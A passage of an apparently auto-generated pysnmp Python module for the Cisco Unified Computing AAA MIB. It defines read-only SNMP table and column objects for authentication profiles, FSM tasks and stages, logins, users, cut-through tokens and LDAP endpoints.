cucsAaaEpAuthProfilePolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfilePolicyLevel.setStatus('current')
cucsAaaEpAuthProfilePolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 8), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfilePolicyOwner.setStatus('current')
cucsAaaEpAuthProfileIpmiOverLan = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 9), CucsAaaIpmiOverLan()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfileIpmiOverLan.setStatus('current')
cucsAaaEpFsmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43), )
if mibBuilder.loadTexts: cucsAaaEpFsmTable.setStatus('current')
cucsAaaEpFsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaEpFsmInstanceId"))
if mibBuilder.loadTexts: cucsAaaEpFsmEntry.setStatus('current')
cucsAaaEpFsmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaEpFsmInstanceId.setStatus('current')
cucsAaaEpFsmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmDn.setStatus('current')
cucsAaaEpFsmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmRn.setStatus('current')
cucsAaaEpFsmCompletionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 4), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmCompletionTime.setStatus('current')
cucsAaaEpFsmCurrentFsm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 5), CucsAaaEpFsmCurrentFsm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmCurrentFsm.setStatus('current')
cucsAaaEpFsmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmDescr.setStatus('current')
cucsAaaEpFsmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 7), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmFsmStatus.setStatus('current')
cucsAaaEpFsmProgress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmProgress.setStatus('current')
cucsAaaEpFsmRmtErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmRmtErrCode.setStatus('current')
cucsAaaEpFsmRmtErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmRmtErrDescr.setStatus('current')
cucsAaaEpFsmRmtRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 43, 1, 11), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmRmtRslt.setStatus('current')
cucsAaaEpFsmStageTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44), )
if mibBuilder.loadTexts: cucsAaaEpFsmStageTable.setStatus('current')
cucsAaaEpFsmStageEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaEpFsmStageInstanceId"))
if mibBuilder.loadTexts: cucsAaaEpFsmStageEntry.setStatus('current')
cucsAaaEpFsmStageInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaEpFsmStageInstanceId.setStatus('current')
cucsAaaEpFsmStageDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageDn.setStatus('current')
cucsAaaEpFsmStageRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageRn.setStatus('current')
cucsAaaEpFsmStageDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageDescr.setStatus('current')
cucsAaaEpFsmStageLastUpdateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 5), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageLastUpdateTime.setStatus('current')
cucsAaaEpFsmStageName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 6), CucsAaaEpFsmStageName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageName.setStatus('current')
cucsAaaEpFsmStageOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageOrder.setStatus('current')
cucsAaaEpFsmStageRetry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageRetry.setStatus('current')
cucsAaaEpFsmStageStageStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 44, 1, 9), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmStageStageStatus.setStatus('current')
cucsAaaEpFsmTaskTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7), )
if mibBuilder.loadTexts: cucsAaaEpFsmTaskTable.setStatus('current')
cucsAaaEpFsmTaskEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaEpFsmTaskInstanceId"))
if mibBuilder.loadTexts: cucsAaaEpFsmTaskEntry.setStatus('current')
cucsAaaEpFsmTaskInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaEpFsmTaskInstanceId.setStatus('current')
cucsAaaEpFsmTaskDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmTaskDn.setStatus('current')
cucsAaaEpFsmTaskRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmTaskRn.setStatus('current')
cucsAaaEpFsmTaskCompletion = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 4), CucsFsmCompletion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmTaskCompletion.setStatus('current')
cucsAaaEpFsmTaskFlags = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 5), CucsFsmFlags()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmTaskFlags.setStatus('current')
cucsAaaEpFsmTaskItem = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 6), CucsAaaEpFsmTaskItem()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmTaskItem.setStatus('current')
cucsAaaEpFsmTaskSeqId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 7, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpFsmTaskSeqId.setStatus('current')
cucsAaaEpLoginTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8), )
if mibBuilder.loadTexts: cucsAaaEpLoginTable.setStatus('current')
cucsAaaEpLoginEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaEpLoginInstanceId"))
if mibBuilder.loadTexts: cucsAaaEpLoginEntry.setStatus('current')
cucsAaaEpLoginInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaEpLoginInstanceId.setStatus('current')
cucsAaaEpLoginDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginDn.setStatus('current')
cucsAaaEpLoginRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginRn.setStatus('current')
cucsAaaEpLoginDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginDescr.setStatus('current')
cucsAaaEpLoginId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginId.setStatus('current')
cucsAaaEpLoginIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginIntId.setStatus('current')
cucsAaaEpLoginLocalHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginLocalHost.setStatus('current')
cucsAaaEpLoginName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginName.setStatus('current')
cucsAaaEpLoginRemoteHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginRemoteHost.setStatus('current')
cucsAaaEpLoginSession = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 10), CucsAaaSession()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginSession.setStatus('current')
cucsAaaEpLoginSwitchId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 11), CucsNetworkSwitchId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginSwitchId.setStatus('current')
cucsAaaEpLoginPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 12), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginPolicyLevel.setStatus('current')
cucsAaaEpLoginPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 8, 1, 13), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpLoginPolicyOwner.setStatus('current')
cucsAaaEpUserTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9), )
if mibBuilder.loadTexts: cucsAaaEpUserTable.setStatus('current')
cucsAaaEpUserEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaEpUserInstanceId"))
if mibBuilder.loadTexts: cucsAaaEpUserEntry.setStatus('current')
cucsAaaEpUserInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaEpUserInstanceId.setStatus('current')
cucsAaaEpUserDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserDn.setStatus('current')
cucsAaaEpUserRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserRn.setStatus('current')
cucsAaaEpUserDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserDescr.setStatus('current')
cucsAaaEpUserName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserName.setStatus('current')
cucsAaaEpUserPriv = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 7), CucsAaaEpAccess()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserPriv.setStatus('current')
cucsAaaEpUserPwd = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserPwd.setStatus('current')
cucsAaaEpUserPwdSet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 9), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserPwdSet.setStatus('current')
cucsAaaEpUserConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 10), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserConfigState.setStatus('current')
cucsAaaEpUserConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserConfigStatusMessage.setStatus('current')
cucsAaaEpUserIsPwdEnc = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 9, 1, 14), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpUserIsPwdEnc.setStatus('current')
cucsAaaExtMgmtCutThruTknTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10), )
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknTable.setStatus('current')
cucsAaaExtMgmtCutThruTknEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaExtMgmtCutThruTknInstanceId"))
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknEntry.setStatus('current')
cucsAaaExtMgmtCutThruTknInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknInstanceId.setStatus('current')
cucsAaaExtMgmtCutThruTknDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknDn.setStatus('current')
cucsAaaExtMgmtCutThruTknRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknRn.setStatus('current')
cucsAaaExtMgmtCutThruTknAuthUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknAuthUser.setStatus('current')
cucsAaaExtMgmtCutThruTknDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknDescr.setStatus('current')
cucsAaaExtMgmtCutThruTknIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknIntId.setStatus('current')
cucsAaaExtMgmtCutThruTknLocales = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknLocales.setStatus('current')
cucsAaaExtMgmtCutThruTknName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknName.setStatus('current')
cucsAaaExtMgmtCutThruTknPnDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknPnDn.setStatus('current')
cucsAaaExtMgmtCutThruTknPriv = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 10), CucsAaaAccess()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknPriv.setStatus('current')
cucsAaaExtMgmtCutThruTknRemote = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 11), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknRemote.setStatus('current')
cucsAaaExtMgmtCutThruTknToken = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 12), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknToken.setStatus('current')
cucsAaaExtMgmtCutThruTknType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 13), CucsAaaExtMgmtAccess()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknType.setStatus('current')
cucsAaaExtMgmtCutThruTknUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 14), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknUser.setStatus('current')
cucsAaaExtMgmtCutThruTknCreationTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 15), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknCreationTime.setStatus('current')
cucsAaaExtMgmtCutThruTknAuthDomain = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknAuthDomain.setStatus('current')
cucsAaaExtMgmtCutThruTknPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 17), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknPolicyLevel.setStatus('current')
cucsAaaExtMgmtCutThruTknPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 10, 1, 18), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaExtMgmtCutThruTknPolicyOwner.setStatus('current')
cucsAaaLdapEpTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11), )
if mibBuilder.loadTexts: cucsAaaLdapEpTable.setStatus('current')
cucsAaaLdapEpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLdapEpInstanceId"))
if mibBuilder.loadTexts: cucsAaaLdapEpEntry.setStatus('current')
cucsAaaLdapEpInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLdapEpInstanceId.setStatus('current')
cucsAaaLdapEpDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpDn.setStatus('current')
cucsAaaLdapEpRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpRn.setStatus('current')
cucsAaaLdapEpAttribute = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpAttribute.setStatus('current')
cucsAaaLdapEpBasedn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpBasedn.setStatus('current')
cucsAaaLdapEpDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpDescr.setStatus('current')
cucsAaaLdapEpFilter = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFilter.setStatus('current')
cucsAaaLdapEpFsmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmDescr.setStatus('current')
cucsAaaLdapEpFsmPrev = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmPrev.setStatus('current')
cucsAaaLdapEpFsmProgr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmProgr.setStatus('current')
cucsAaaLdapEpFsmRmtInvErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 11), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRmtInvErrCode.setStatus('current')
cucsAaaLdapEpFsmRmtInvErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 12), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRmtInvErrDescr.setStatus('current')
cucsAaaLdapEpFsmRmtInvRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 13), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRmtInvRslt.setStatus('current')
cucsAaaLdapEpFsmStageDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 14), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageDescr.setStatus('current')
cucsAaaLdapEpFsmStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 15), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStamp.setStatus('current')
cucsAaaLdapEpFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStatus.setStatus('current')
cucsAaaLdapEpFsmTry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 17), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmTry.setStatus('current')
cucsAaaLdapEpIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 18), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpIntId.setStatus('current')
cucsAaaLdapEpName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 19), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpName.setStatus('current')
cucsAaaLdapEpRetries = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 20), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpRetries.setStatus('current')
cucsAaaLdapEpTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 21), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpTimeout.setStatus('current')
cucsAaaLdapEpPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 22), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpPolicyLevel.setStatus('current')
cucsAaaLdapEpPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 23), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpPolicyOwner.setStatus('current')
cucsAaaLdapEpFsmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45), )
if mibBuilder.loadTexts: cucsAaaLdapEpFsmTable.setStatus('current')
cucsAaaLdapEpFsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLdapEpFsmInstanceId"))
if mibBuilder.loadTexts: cucsAaaLdapEpFsmEntry.setStatus('current')
cucsAaaLdapEpFsmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLdapEpFsmInstanceId.setStatus('current')
cucsAaaLdapEpFsmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmDn.setStatus('current')
cucsAaaLdapEpFsmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRn.setStatus('current')
cucsAaaLdapEpFsmCompletionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 4), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmCompletionTime.setStatus('current')
